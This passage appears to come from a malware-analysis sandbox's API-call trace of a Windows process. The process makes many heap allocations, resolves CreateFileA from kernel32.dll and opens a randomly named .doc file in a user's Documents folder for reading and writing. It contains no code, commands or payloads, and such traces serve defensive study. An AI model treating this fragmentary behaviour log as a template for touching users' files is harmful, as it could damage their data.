lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd78 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0034.017] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0034.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.020] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.022] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889958 [0034.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889958, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0034.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.022] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0034.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0034.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889958, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0034.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.023] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0034.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", cchWideChar=122, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 122 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7a) returned 0x7d5c40 [0034.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", cchWideChar=122, lpMultiByteStr=0x7d5c40, cbMultiByte=122, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", lpUsedDefaultChar=0x0) returned 122 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.023] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\guwdp36jwck.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=122, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 122 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf4) returned 0x7c5448 [0034.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=122, lpWideCharStr=0x7c5448, cchWideChar=122 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc") returned 122 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c50e0 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.024] 